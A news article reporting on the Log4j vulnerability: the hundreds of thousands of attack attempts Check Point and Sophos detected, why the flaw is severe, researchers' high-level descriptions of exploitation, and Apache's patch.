Researchers detect hundreds of thousands of Log4j cyberattack attempts

SECURITY

Researchers at two cybersecurity companies have detected hundreds of thousands of attempts to launch cyberattacks using the recently disclosed vulnerability in Log4j. 

The number of hacking attempts is particularly alarming because the vulnerability was only discovered last Thursday. 

Check Point Software Technologies Ltd., a publicly traded cybersecurity provider, said it has blocked more than 800,000 Log4j-related breach attempts. Sophos Group PLC, in turn, has detected “hundreds of thousands” of cyberattacks, the breach prevention giant disclosed on Sunday.

Log4j is a popular open-source tool for collecting diagnostics data from applications written in the Java programming language. On Thursday, it was revealed that a critical security flaw in Log4j can be used by hackers to breach vulnerable systems. Check Point Software has called the flaw “one of the most serious vulnerabilities on the internet in recent years.”

There are several reasons why the vulnerability is so severe. One is the fact that Log4j is widely used in enterprise applications: The tool has been downloaded more than 400,000 times from GitHub to date. Moreover, Log4j is included in many popular open-source frameworks as a built-in component. Apple Inc. and Microsoft Corp. are among the major companies known to use Log4j in some of their systems.

Another reason why the vulnerability represents a major cybersecurity risk is that it’s relatively easy for hackers to exploit. According to Microsoft researchers, hackers can activate the vulnerability by sending a malicious string, or series of characters, to a vulnerable application.

Logging tools such as Log4j are frequently deployed in such a way that they ingest some of the data processed by the workload to which they’re added. For example, Log4j might ingest some of the passwords that users type into an application’s login form. According to Microsoft, that means hackers can in theory compromise a vulnerable application simply by entering a malicious string into its login form or another part of the interface.

“Successful exploitation allows for arbitrary code execution in the targeted application,” Microsoft researchers explained in a blog post. “Attackers do not need prior access to the system to log the string and can remotely cause the logging event by using commands like curl against a target system to log the malicious string in the application log.”

“It is also likely that internal vulnerable systems may be targeted with post-compromise activity for lateral movement within the affected enterprise,” explained researchers from Cisco Systems Inc.’s Talos cybersecurity unit. Lateral movement is the term for cyberattacks that use a compromised device or application to infect other systems in the same network. 

According to Check Point Software, more than 60 versions of the original exploit emerged within 24 hours of its publication. Microsoft researchers have also determined that hackers are using multiple tactics to target vulnerable systems.

The Apache Software Foundation, which is responsible for the development of Log4j, has released a patch that fixes the vulnerability. The open-source group also published a guide on how administrators can block hacking attempts if downloading the patch is not possible.

A number of cybersecurity providers, including Sophos, Check Point Software, Cloudflare Inc. and others, have taken steps to protect customers whose infrastructure may contain vulnerable Log4j deployments. 

Image: Unsplash